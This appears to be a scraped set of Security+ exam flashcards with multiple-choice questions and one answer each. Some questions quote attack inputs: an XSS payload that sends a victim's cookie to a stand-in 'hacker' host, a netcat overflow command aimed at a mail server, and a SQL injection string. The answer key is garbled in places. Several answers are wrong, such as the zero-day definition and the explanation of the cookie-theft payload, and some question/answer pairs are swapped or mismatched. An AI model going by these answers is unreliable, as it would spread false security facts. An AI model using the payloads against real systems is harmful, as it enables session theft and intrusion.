Security + Cert - Merged RM

Ace your homework & exams now with Quizwiz!

Tabletop exercise

A director of IR is reviewing a report regarding several recent breaches. The director compiles the following statistic's -Initial IR engagement time frame -Length of time before an executive management notice went out -Average IR phase completion The director wants to use the data to shorten the response time. Which of the following would accomplish this?

A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection?

$500

You have an asset valued at $16,000. The exposure factor of a risk affecting that asset is 35%. The annualized rate of occurrence is 75%. What is the SLE?

$5600

Your company has hired an outside security firm to perform various tests on your network, specifically vulnerability scans. During this vulnerability scan, you provided the company with a set of usernames and passwords for various systems (database server, application server, web server) to assist in their scan. What best describes what is happening?

A Credentialed Scan

Shannon works for a security company that performs pen tests for clients. She's currently conducting a test of an e-commerce company and discovers that after compromising the web server, she can use the web server to launch a second attack into the company's internal network. What type of attack is this considered?

A Pivot

You are a security analyst and you have just successfully removed malware from a virtual server. Which could you use to return the virtual server to its last known good state?

A Snapshot

To determine the ALE of a particular risk, which of the following must be caculated?

ARO SLE

To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO).

ARO, SLE

As the security director, you identify a security risk to a planned network migration. You decide to continue with the current migration plan anyway since you deem it to be low risk. What type of response technique has been demonstrated?

Accept

A penetration tester harvests Potential usernames From a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using?

Active reconnaissance

The computer resource center issue smartphones to all first-level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implemented with the type of tools the managers installed?

Application manager

Caleb is installing an HVAC system in his data center and would like to know what this HVAC system will have the most impact on. Please choose from the following:

Availability

Of the following terms, which one refers to the process of establishing a standard for security?

Baselining

A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks? (Select TWO)

Block access to personal email on corporate systems Update corporate policy to prohibit access to social media websites

Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS?

Buffer overflow

During a routine vulnerability assessmen,t the following command was successful: echo "vrfy 'perl -e 'print "hi" x 500 ' '" I nc www.company.com 25 Which of the following vulnerabilities is being exploited?

Buffer overflow directed at a specific hostMTA

Shelton is the manager at one of your local branch banks. He wants to ensure all customer information isn't compromised when the employees step away from their desks for a day. What would be used to mitigate this concern?

Clean Desk

Kevin is concerned about authentication and permissions (he is responsible for database security for his company). Which should be his first step?

Conduct a Permissions Audit

An organization has several production-critical SCADA supervisory systems that cannot follow the normal 30- day patching policy. Which of the following BEST maximizes the protection of these systems from malicious software?

Configure a firewall with deep packet inspection that restricts traffic to the systems.

Choose the attack that depends on the attacker entering JavaScript into a text area that is intended for users to enter text that can be viewed by other users:

Cross-site scripting

Stewart works for an organization where employees all have cloud-based solutions for data storage. Stewart has requested funding from the CIO in order to install a DLP solution. What security hazard, if any, is Stewart trying to solve?

Data Exfiltration through the cloud

Of the listed operations, which should you undertake to avoid mishandling of tapes, removal drives, CDs, and DVDs?

Data Labeling

Jason is worried about an email he received from a coworker. He's concerned about the validity of the email because the coworker denies sending it. How can he prove the origin of the email?

Digital Signature

Of the following resources, which feature of cloud computing would involve deprovisioning resources as needed?

Elasticity

You have been presented with the task of implementing a solution that ensures data stored on a removable USB drive hasn't been tampered with or changed. Which should be implemented?

File Hashing

James is worried about how his company will respond to breaches. He's interested in finding a way that will identify files that have been altered during the breach. What is the best solution for him to implement

File Integrity Checker

Logan would like to test his company's web application and evaluate if it's handling input validation and data validation properly. Of the following, which testing method would be most effective for this scenario?

Fuzzing

Ashley is attempting to increase security at her company. She's currently creating an outline of all aspects of security that will need to be evaluated and acted on. Of the following terms, which one describes the process of improving security in a trusted OS?

Hardening

An accounting employee changes roles with other accounting employees every few months. What is this called?

Job Rotation

Josh manages network security at his company and has noticed that NTP is not working correctly. What security protocol will be affected by this?

Kerberos

Your company is looking for a secure backup tool for key storage in a PKI. Which one would you recommend?

Key Escrow

When issuing a ticket, which of the following does Kerberos use?

Key distribution center

After a security incidnet, management is meeting with involved employees to document the incident and its aftermath. Which of the following BEST describes this phase of the incident response process?

Lessons learned

You have noticed your company lacks deterrent controls. As the new security administrator, which of the following would you install that satisfies your needs?

Lighting

Which is a term for technical controls?

Logical Controls

Grady is seeking access control methods that enforce authorization rules by the OS. Users cannot override authentication or access control policies. Which of the following best suits these needs?

MAC (Mandatory Access Controls)

As the security manager, you need to reduce the risk of employees working in collusion to embezzle funds. Which process would you implement?

Mandatory Vacations

A systems administrator is configuring a system that uses data classification labels. Which of the following will the administrator need to implement to enforce access control?

Mandatory access control

Which of the following would not be able to detect a security breach or malicious action that was committed by an internal employee?

Nondisclosure agreements (signed by employees)

Derrick is implementing virtualized systems in his network. He's currently using a Type I hypervisor. What operating system should be on the machines in order for him to install the hypervisor?

None

Stewart has instructed all administrators to disable nonessential ports on their local servers. Why are these protocols a security issue that matters?

Nonessential ports provide additional areas of attack

Attackers have been using revoked certificates for MITM attacks to steal credentials from employees of Company.com. Which of the following options should Company.com implement to mitigate these attacks?

OCSP stapling

Jacob is in charge of network security for an e-commerce company. He wants to ensure that best practices are being used for the website that his company hosts. Which of the following is the best option to consider?

OWASP (Open Web Application Security Project)

A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over untrusted media. Which of the following BEST describes the action performed by this type of application?

Obfuscation

A systems administrator wants to generate a self-signedcertificate for an internal website. Which of the following steps should the systems administrator complete prior to installing the certificate on the server?

Provide the private key to the internal CA.

Your supervisor has asked you about protecting the privacy of personally identifiable information (PII) that is collected. As the security administrator, which is the best option to meet these requests?

PIA

Of the following cloud service models, which service provides the consumer with the infrastructure to create and host applications?

PaaS (Platform as a service)

Of the listed principles below, which is NOT a common security policy type?

Parking Policy

Which of the following security actions would be equivalent to the concept of implementing a VLAN in the real world?

Partitioning the office building into separate departments on each floor

Cheyenne is doing a penetration test for a client's network and is currently gathering information from sources such as archive.org, netcraft.com, social media, and other information websites. What stage has just been described?

Passive Reconnaissance

Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system?

Passive Scan

Acme company requires their employees to change their passwords every three months. Hank struggles to remember new passwords so he keeps switching back and forth between two passwords. Which policy would help prevent this?

Password History

Lamar manages the account management for his company. He's worried about hacking tools that use rainbow tables. Which of the following is the most beneficial for mitigating this threat?

Password length

While working through a malware outbreak, you discover something very odd on your company network. There's a file that has the same name as a Windows system DLL file and has the same API interface but handles the input very differently. It also looks like applications have been attaching to this file rather than the real system DLL. What best describes this?

Shimming

Alissa manages network security at her company. She's had several calls from users stating that their personal data is being stolen when they use the wireless network. Several of them have insisted they only connect to the corporate wireless access point (WAP), but logs for the WAP show the users have never connected to it. Which of the following explains this situation?

Rogue Access Point

Walter is working to implement Type II authentication. Which would be the best example of type II authentication

Smart Cards

Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal?

Smart card

Of the listed items, which is not a step of the incident response process?

Snapshot

Which of the following types of firewalls will examine the context of each packet it encounters?

Stateful packet filtering firewall

The company you work for is considering moving its email server to a hosting company. This will help reduce the cost of hardware and server administration at your local site. Which document formally states the reliability and recourse if reliability isn't met?

SLA (Service Level Agreement)

Lisa manages incident response for a bank. The bank has a website that's been attacked. The attacker utilized the login screen, and rather than entering proper login credentials, the attacker entered some odd text: ' or '1'='1. What is this attack known as?

SQL Injection

Of the following choices, which item best shows the state of a computer at the time it was collected by law enforcement?

Screenshots

Company A agrees to provide perimeter protection, power, and environmental support with measurable goals for Company B, but will not be responsible for user authentication or patching of operating systems within the perimeter. Which of the following is being described?

Service Level Agreement

Two users must encrypt and transmit large amount of data between them. Which of the following should they use to encrypt and transmit the data?

Symmetric algorithm

Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data?

Symmetric algorithm

Jeff is the network administrator and sometimes needs to run a packet sniffer so he can view the network traffic. He would like to find a well-known packet sniffer that works on Linux. Which of the following is the best choice?

Tcpdump

A security analyst is reviewing patches on servers. One of the servers is reporting the following error message in the WSUS management console: The computer has not reported status in 30 days. Given this scenario, which of the following statements BEST represents the issue with the output above?

The computer in question has not pulled the latest application software updates.

Eddie is your security manager and he received a call from law enforcement telling him that some of his computers on his network participated in a massive DoS attack. He's certain that none of his employees would be involved in a cybercrime. What best explains the given scenario?

The machines are bots

In your company, there are some computers on your network that still use Windows XP. They have to stay at XP and cannot be upgraded due to application specifications. The application doesn't run on newer operating systems. What security issue does this pose?

The machines cannot be patched as XP is no longer supported

You're currently looking for a network authentication method that uses digital certificates and doesn't require users to remember passwords. Which method is the most beneficial?

Tokens

A security analyst is acquiring data from a potential network incident. Which of the following evidence is the analyst MOST likely to obtain to determine the incident?

Traffic and logs

User from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors?

Trust model

An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome?

Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

A oftware development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production . Which of the following development methodologies is the team MOST likely using now?

Waterfall

Of the following, which is the most fundamental BIOS integrity technique?

Managing BIOS passwords

Of the listed principles, which could be found in a DRP (Disaster Recovery Plan)?

Prioritized list of critical systems

Of the items listed, which provides additional encryption strength by repeating the encryption process with additional keys?

3DES

Kristi is setting up database servers on their own subnet. She has placed them on 10.10.3.3/29. How many nodes can be allocated in this subnet?

6

Caleb is running a port scan on a network to meet some requirements of a security audit. He has noticed that domain controller is using secured LDAP. Which port would lead him to that conclusion?

636

George is a security officer for a bank. When an executive has a laptop decommissioned, he wants to be sure that all of the data is completely wiped and unrecoverable, even via forensic tools. How many times should the hard drive be wiped?

7

Of the following standards, which one support WPA2 but not WEP or WPA?

802.11i

Put the VoIP network into a different VLAN than the existing data network.

A company is deploying a new VoIP phone system. They require 99.999% uptime for their phone service and are concerned about their existing data network interfering with the VoIP phone system. The core switches in the existing data network are almost fully saturated. Which of the following options will pro-vide the best performance and availability for both the VoIP traffic, as well as the traffic on the existing data network?

Of the listed items, which can be considered as a single point of failure?

A configuration

It provides extended site validation

A security administrator is trying to encrypt communication. For which of the following reasons should administrator take advantage of the Subject Alternative Name (SAM) attribute of a certificate?

Which of the following differentiates a collision attack from a rainbow table attack?

A rainbow table attack performs a hash lookup.

Enable group policy based screensaver timeouts

A security administrator has been tasked with improving the overall security posture related to desktop machines on the network. An auditor has recently that several machines with confidential customer information displayed in the screens are left unattended during the course of the day. Which of the following could the security administrator implement to reduce the risk associated with the finding?

Of the following, which describes a zero-day vulnerability?

A vulnerability that has been known to the vendor for zero days

As the IT department head for a local school district, you're searching for a way to promote safe/responsible use of the Internet for the students. With the help from some local teachers, you work through developing a document for students to sign. This document describes the methods of accessing the Internet via the school's network. Which of the following is the best description of this document?

Acceptable Use Policy

Develop and implement updated access control policies Assess and eliminate inactive accounts

After a merger between two companies a security analyst has been asked to ensure that the organization's systems are secured against infiltration by any former employees that were terminated during the transition. Which of the following actions are MOST appropriate to harden applications against infiltration by former employees? (Select TWO)

Liz is responsible for incident response at her company. One of her jobs is to attempt to attribute attacks to a specific type of attacker. Which of the following is not an attribute that would be considered in attributing the attack?

Amount of data stolen

A member of the admins group reports being unable to modify the "changes" file on a server. The permissions on the file are as follows: Permissions User Group File -rwxrw-r--+ Admins Admins zChanges Based on the output above, which of the following BEST explains why the user is unable to modify the "changes" file?

An FACL has been added to the permissions for the file.

A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports include the following critical-rated vulnerability: Title: Remote Command Execution vulnerability in web server Rating : Critical (CVSS 10.0) Threat actor: any remote user of the web server Confidence: certain Recommendation: apply vendor patches Which of the following actions should the security analyst perform FIRST?

Apply organizational context to the risk rating.

A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task?

Arp- s 192.168.1.1 00- 3a-d1-fa-b1-06

Which encryption type offers easy key exchange and key management?

Asymmetric

Caleb is worried his SIEM logs aren't being stored long enough or securely enough. He is aware that a breach may not be discovered until long after it occurs. This would require the company to analyze older logs, so it's important that he finds a SIEM log backup solution that can do the following: handle all aggregate logs of the SIEM, be maintained for a long period of time, and maintain the integrity of logs being stored. Which of the following solutions would ensure the integrity of the data isn't changed after storage?

Back up WORM storage

You work for a company that has outsourced development of a specific application to a local programming firm, however, after three months of using the product, one of your accountants accidentally discovers a way to log in and bypass all security and authentication. Of the following options, what best describes this?

Backdoor

The web server administrator at your e-commerce company is concerned about someone using netcat to connect to the company web server to retrieve detailed information. What best describes this concern?

Banner Grabbing

The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?

Behavior-based IPS with a communication link to a cloud-based vulnerability and threatfeed

A company has a data classification system with definitions for "Private" and "Public". the company's security policy outlines how data should be protected based on type. The company recently added data type "Proprietary". Which of the following is the MOST likely reason the company added this data type?

Better data classification

Michael manages the secure communications at his company and would like to give administrators the option to log in remotely and execute command-line functions. He would like for this to only be possible via a secure encrypted connection. What action should be taken on the firewall?

Block port 23 and allow port 22

Of the following, which best describes a compromised collection of computers being controlled from one central point?

Botnet

Of the following, which is commonly used in a DDoS attack?

Botnet

While troubleshooting a client application connecting to the network, the security administrator notices the following error: Certificate is not valid. Which of the following is the BEST way to check if the digital certificate is valid?

CRL

Steven is constantly receiving calls from wireless users who are being redirected to a login page when they connect to the network. The login page comes up whenever the users first connect to the network and attempt to access any website outside of the local area network from within their web browsers. Which of the following is causing this to happen?

Captive Portal

The IT department is deploying new computers. To ease the transition, users will be allowed to access their old and new systems. The help desk is recieve reports that users are experiencing the following error when attemping to log in to their previous system: Logon Failure: Access Denied Which of the following can cause the issue?

Certificate Issues

Isaac is looking for a physical access solution for his company. He needs the solution to use asymmetric cryptography or public-key cryptography to authorize users. What type of solution is he seeking?

Challenge response token

Of the listed principles, which one states that multiple changes made to computer systems shouldn't be made simultaneously?

Change Management

Which of the following is considered a step in account maintenance?

Check to see that all accounts are for active employees

As the security administrator, you're concerned about a variety of attacks that could affect your company's web server. You've recently heard about an attack where an attacker sends more data to a target than the target is expecting. If done correctly, this can cause the target to crash. What type of action can best prevent this type of attack?

Checking buffer boundaries

A security administrator needs to address the following audit recommendations for a public-facing SFTP server: Users should be restricted to upload and download files to their own home directories only. Users should not be allowed to user interactive shell login. Which of the following configuration parameters shojld be implemented?

ChrootDirectory PermitTTY

Of the list below, what type of attack involves users clicking on something different on a website then what they intended to click on?

Clickjacking

Sharon is responsible for the security on web applications. She's looking to see if all applications have input validation. What is the best way to implement validation?

Client-side and server-side validation

A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement?

Cloud-based site

What type of attack exists when an attacker tries to find an input value that will produce the same hash as a password?

Collision Attack

A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of the following settings should the network administrator implement to accomplish this?

Configure the OS default TTL to 1

From the list below, choose the type of attack that exploits the trust of a website for an authenticated user to attack the website by spoofing requests from the trusted user:

Cross-Site Request Forgery

Which of the following controls allows a security guard to perform a post-incident review?

Corrective

Tim is managing the SIEM for his company. The SIEM aggregates logs from multiple servers. In the event a breach is discovered, which would be the most important concern?

Correlation

A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of the scan being performed?

Credentialed

A forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the following SAN features might have caused the problem?

Decuplication

Lonnie noticed that attackers have breached his WiFi network and have gained access via a wireless access point administrative panel and logged in with the credentials the WAP was shipped with. What best describes this issue?

Default Configuration

A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFI- enabled baby monitor while the baby's parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor?

Default configuration

A systems administrator is deploying a new mission essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic?

Denial of service

A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a requirement for this configuration?

Deploying certificates to endpoint devices

As the security administrator, you advise the web development team to include a CAPTCHA on a webpage where users are able to register for an account. Which control is this referring to?

Deterrent

Courtney manages data security on BYOD and COPE devices. She's specifically concerned about the data being exposed should a device be lost or stolen. Which item would the best to alleviate this concern?

Device Encryption

Josh noticed that an attacker is trying to get network passwords by using a software that attempts a number of passwords from a list of common passwords. What type of attack is this called?

Dictionary

Alissa is worried about peripheral devices being exploited by an attacker. Which of the following is the best option for the first step in mitigating this threat?

Disable WiFi for any peripheral device that doesn't need it.

You've noticed someone has been rummaging through your company's trash bins for documents, diagrams, and other sensitive information that has been thrown out. What is this known as?

Dumpster Diving

You've noticed that someone has been rummaging through the company's trash bins looking for documents, diagrams, and other sensitive information that's been thrown out. What is this called?

Dumpster Diving

Josh works for a company that has branch offices that connect back to the main office via a VPN. Josh recently noticed the key used on the VPN has been compromised. What should be done to ensure it isn't compromised in the future?

Enable perfect forward secrecy at the main office and branch office ends of the VPN.

Backup tapes are stored off-site. What should be done with them?

Encrypt the backup data

A security analyst has received the following alert snippet from the HIDS appliance: Pl=IU TO-C-OL STG SRC7='0RT O'ST.PO T TCP XMAS SCAN 192.168.1.1:1091 192.168.1.2:8891 TCP XMAS SCAN 192.168.1.1:649 192 .168.1.2:9001 TCP XMAS SCAN 192.168 .1.1:2264 192.168 .1.2:6455 TCP XMAS CAN 192.168.1.1:3464 192.168.1.2:8744 Given the above logs, which of the following is the cause of the attack?

FIN, URG, and PSH flags are set in the packet header.

Ashley was asked to implement a secure protocol to use during file transfers that use digital certificates. What protocol would be the best option?

FTPS (File Transfer Protocol Secure)

Choose an example of PHI?

Fingerprints

After attempting to harden a web server, a security analyst needs to determine if an application remains vulnerable to SQL injection attacks. Which of the following wquld BEST assist the analyst in making this determination?

Fuzzer

An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned network can be seen sending packets to the wrong gateway. Which of the following network devices is misconfigured and which of the following should be done to remediate the issue?

Firewall; implement an ACL on the interface

Choose the scenario where using a shared account would pose the least security risk.

For guest Wi-Fi Access

Elizabeth is seeking a solution that will allow the network to retrieve information from various web resources in which all traffic passes through a proxy. What would be the best solution?

Forward Proxy

You work for Macy's. The web server certificate has been revoked and you have some customers receiving errors when they connect to the website. What is the corrective action you must take?

Generate a new key pair and a new certificate

Margo works for a medium-sized company and is responsible for its cyber security. The company has a large number of salespeople who are required to travel for work. The company has been using ABAC for access control and recent there have been a number of logins being rejected incorrectly. What might be causing this issue?

Geographic Locations

Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test?

Gray box

You manage the account access control and authorization at your work, a large college. There are approximately 30,000 students and 1,200 faculty/staff that you manage accounts for. Which of the following is the best access control/account management approach?

Group-Based

Kim would like to implement a server authentication method that depends on TPM in a server. What's the best approach?

Hardware-Based Access Control

An organization requires users to provide their fingerprints to access an application. To improve security, the application developers intend to implement multifactor authentication. Which of the following should be implemented?

Have users sign their name naturally

Deterrent

Having adequate lighting on the outside of a building is an example of which of the following security controls?

You have configured a nonproduction network to try to observe hacker techniques. This network is to be used as a target, so it can monitor network attacks. What type of network is this called?

Honeypot

A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take?

Identify the source of the active connection

Which of the following is commonly done as part of the vulnerability scan?

Identifying unpatched workstations

A company offers Saas, maintaining all customers' credentials and authenticating locally. Many large customers have requested the company offer some form of federation with their existing authentication infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations?

Implement SAML so the company's services may accept assertions from the customers' authentication servers.

Cassie is worried about credential management on a network where users often have over six passwords to remember. She's currently interested in finding a solution to this problem. Which would be the best way to address this issue?

Implement a manager

A security administrator learns that PII, which was gathered by the organization, has been found in an open forum. As a result, several C-levelexecutives found their identities were compromised, and they were victims of a recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO).

Implement an email OLP. Implement a spam filter.

Cierra is the CISO for her company. She's working to mitigate the danger of computer viruses in her network. Which administrative control can be implemented to assist with this goal?

Implement policies regarding email attachments and file downloads

A security ana!yst is securing smartphones and laptops for a highly mobile workforce. Priorities include: Remote wipe capabilities Geolocation services Patch management and reporting Mandatory screen locks Ability te require passcodes and pins Ability to require encryption Which of the following would BEST meet these requirements?

Implementing MDM software

Jason manages password management for his company. Sometimes users cannot remember their passwords. What is the best option for Jason to address this?

Implementing password recovery

Polymorphic viruses change. This is not a hoax, this is a legitimate virus. Boot sector viruses affect the hard drive, and stealth viruses include a number of different types of viruses.

Incremental

When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal?

Infrastructure

An application was recently compromised after some malformed data came in via web form. Which of the following would MOST likely have prevented this?

Input validation

Jay is a security administrator for a large company and has about 100 hosts on his network that were recently attacked by a virus. He's concerned because there was a patch available that would have minimized the impact from the virus. What is the best solution to implement on the network?

Install patch management software

Several users are complaining they cannot connect to the wireless network and you discover that the WAPs are being subjected to a wireless attack that is designed to block their WiFi signals. Which is the best label for this attack?

Jamming

Rachel manages security for a small bank and has a firewall at the gateway as well as one at each network segment. Each firewall logs all accepted and rejected traffic. Rachel checks each of these logs regularly. What's the first step that should be taken to improve this firewall configuration?

Integrate with SIEM (Security Information and Event Management)

Laura is the security administrator for a bank and is interested in detecting breaches and attempted breaches of the network, including internal breaches. She doesn't want false positives to disrupt productivity. Which of the following devices is the best choice?

Intrusion Detection System

A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage?

Intrusive non-credentialed scan

Of the following principles, which one can be used for a means of two-factor authentication?

Iris Scan and password

Why might it not be advisable to conduct penetration tests on your corporate network?

It can be disruptive for the business activites

Amy found netcat installed on an employee's computer, but the employee isn't authorized to have netcat. What security concern is presented by this utility?

It is a network communication utility

Caleb is the network administrator where users are reporting odd behavior on their computers. He believes this may be due to malware but the behavior is different on different computers. What could best explain this anomaly?

It is a polymorphic virus

Nicole is working to implement a virtual IP load-balancing option and thinks this might alleviate network slowdowns and mitigate some of the impacts from a DoS attack. What is the drawback of virtual IP load-balancing?

It is connection-based, not loaded

Of the following, which is the most important benefit from implementing SDN (Software Defined Network)?

It provides scalability

You have been tasked with doing a vulnerability assessment on a company's network and determine that they are using 802.1x for secured access. Which of the following can a threat actor use to bypass the current network security?

MAC spoofing

Which is the least secure hashing algorithm?

MD5

Which of the following is used to validate the integrity of data?

MD5

Choose an agreement that is not as formal as a traditional contract but still has a level of importance to all involved parties?

MOU (Memorandum of Understanding)

Which of the following refers to the term used to restore a system to its operational state?

MTTR (Mean Time to Repair)

A technician is investigating a potentially compromised device with the following symptoms: Browser slowness Frequent browser crashes Hourglass stuck New search toolbar Increased memory consumption Which of the following types of malware has infected the system?

Man-in-the browser

An incident involving a workstation that is potentially infected with a virus has occurred. The workstation may have sent confidential data to an unknown internet server. Which of the following should a security analyst do FIRST?

Make a copy of everything in memory on the workstation.

Of the listed principles, which is not a part of password complexity?

Minimum Password Length

A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using an old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company. The administrator wants to implement a solution that will eradicate the current worm and any future attacks that may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when implemented?

Network-based intrusion prevention system

A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items. Which of the following BEST describe why this has occurred? (Select TWO)

Non-applicable plug ins were selected in the scan policy The incorrect audit file was used

You work for an insurance company as their security administrator. You've noticed that there are a few accounts still active of employees who have been left the company for at least a year. You are worried that someone might attempt to access these accounts. What administrative control could be enabled to help prevent these accounts from remaining online and accessible after an employee leaves the company?

Off-boarding Procedures

As the network administrator, you are tasked with adding new employees to the identity and access management system. Which of the following best describes this process?

Onboarding

After a recent internal breach, a company decided to regenerate a.nd reissue all certificates used in the transmission of confidential information. The company places the greatest importance on confidentiality and non-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST describes how the company will use these certificates?

One key pair will be used for encryption and decryption. The other will be used to digitally sign the data.

Which of the following works like stream ciphers?

One-Time Pad

Natalie is responsible for the security of web servers and is configuring the WAF to allow only encrypted traffic to and from the web server, including from administrators using the command-line interface. What should she do?

Open port 443 and 22 and block 80 and 23

A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to another host?

Pivoting

What type of virus can alter its own code to avoid being detected by an antivirus?

Polymorphic Virus

Mark is working to set up remote access for the salespeople in his company. Which protocol is most suited for this?

RADIUS

Which of the following has cross-platform support and is used remote access into a network?

RADIUS

Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all the organizations use the native 802.1x client on their mobile devices?

RADIUS federation

Of the following RAID levels, which one is considered a "stripe of mirrors"?

RAID 1+0

You are concerned about fault tolerance for the database server you manage. You need to ensure that if a single drive fails, the data can be recovered. What RAID level would be used to support this goal while simultaneously distributing parity bits?

RAID 5

A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?

RAT

Of the following, which best describes software that provides an attacker with remote access to a victim machine, but it's wrapped with a legitimate program in an attempt to trick the victim into installing the application?

RAT (Remote Access Trojan)

Which of the following provides an example of stream cipher?

RC4 (Rivest Cipher 4)

Which one uses two mathematically-related keys to secure the data during transmission?

RSA (

Trent noticed that a web application used by his company doesn't handle multithreading properly. This could allow an attacker to exploit this vulnerability and crash the server. What type of error was discovered?

Race Conditions

Which of the following uses precomputed hashes to guess passwords?

Rainbow tables

Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred?

Ransomware

While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation from the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of the following incident response steps is Joe working on now?

Recovery

Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host?

Remote exploit

When attempting to secure a mobile workstation, which of the following authentication technologies rely on the user's physical characteristics? (Select TWO)

Retina scan Fingerprint scan

Confidential emails from an organization were posted to a website without the organization's knowledge. Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the emails from being sniffed? (Select TWO)

S/MIME SMTPS

A web developers improves clients access to the company's REST API. Authentication needs to be tokenized but not expose the client's password. Which of the following methods would BEST meet the developer's requirements?

SAML

Lonnie has been assigned the task of choosing a backup communication method for his company in the case of a disaster that disrupts normal communication. Which option provides the most reliability?

SATCOM

A company was recently audited by a third party. The audit revealed the company's network devices were transferring files in the clear. Which of the following protocols should the company use to transfer files?

SCP

A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? (Select TWO)

SCP and Certificate based authentication

The POODLE attack is a MITM exploit that affects:

SSLv2.0 with CBC mode cipher.

John David works for a large retail company that processes credit card purchases and has been asked to test the network for security issues. The specific test he is running involves checking policies, documentation and past incident reports. What describes this type of test?

Security Audit

Larry is responsible for NIDS/NIPS in his company and has configured a new NIPS solution. What part of this device collects data?

Sensor

An organization's employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?

Single sign-on

Of the following email security measures, which item would have the greatest impact on phishing emails?

Spam Filter

A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct Fl AST?

Survey threat feeds from services inside the same industry.

Of the listed users, which is a role-based position that should receive training on how to manage particular systems?

System Owners

A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist?

System sprawl

Josh is thinking of using voice recognition as part of his access control strategy. Choose one weakness with voice recognition.

Systems require training

An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Sect TWO)

TACACS+ and RADIUS

Systems administrator and key support staff come together to simulate a hypothetical interruption of service. The team updates the disaster recovery processes and documentation after meeting. Which of the following describes the team's efforts?

Tabletop exercise

An attacker exploited a vulnerability on a mail server using the code below. <HTML><body onl oad=document.location.replace ('http://hacker/post.asp?victim&message=" + document.cookie + "<br>" + "URL:" +"document.location) ; I> <lbodY> </HTML> Which of the following BEST explains what the attacker is doing?

The attacker is replacing a document.

A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the case?

The certificate has expired

Ellen manages network security and has discovered behavior on a computer that appears as a virus. She identified a file she thinks may be a virus, but no antivirus program has detected the file. Which could most likely be occurring?

The computer has a zero-day exploit

